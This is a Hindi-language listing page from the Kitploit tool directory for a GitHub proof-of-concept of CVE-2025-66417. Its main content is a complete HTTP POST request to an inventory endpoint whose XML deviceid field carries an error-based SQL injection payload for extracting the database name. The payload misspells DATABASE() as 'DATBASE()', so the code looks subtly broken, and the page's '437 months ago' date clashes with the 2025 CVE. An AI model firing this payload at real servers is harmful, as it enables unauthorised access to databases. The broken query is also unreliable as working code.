Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66417-POC — CVE-2025-66417 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो वेब एप्लिकेशन इन्वेंट्री एंडपॉइंट से डेटाबेस जानकारी निकालने के लिए XML POST अनुरोध के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/lem0naids/cve-2025-66417-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHublem0naids/cve-2025-66417-poc

CVE-2025-66417-POC

CVE-2025-66417 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो वेब एप्लिकेशन इन्वेंट्री एंडपॉइंट से डेटाबेस जानकारी निकालने के लिए XML POST अनुरोध के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है।

रिपॉजिटरी देखें
437 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-66417

प्रमाण अवधारणा CVE-2025-66417

root@kitploit:~
POST /front/inventory.php HTTP/1.1
Host: <>
Accept-Encoding: gzip, deflate, br
Accept: text/html
Connection: keep-alive
Content-Type: text/xml
Content-Length: 429

<?xml version="1.0" encoding="UTF-8"?>
<xml>
  <QUERY>get_params</QUERY>
  <deviceid><![CDATA[' AND EXTRACTVALUE(
  1,
  CONCAT(
    0x7e,
    IFNULL(
    (SELECT DATBASE()),
      'NONE'
    ),
    0x7e
  )
)-- -]]></deviceid>
  <content></content>
</xml>
टूल डाउनलोड करें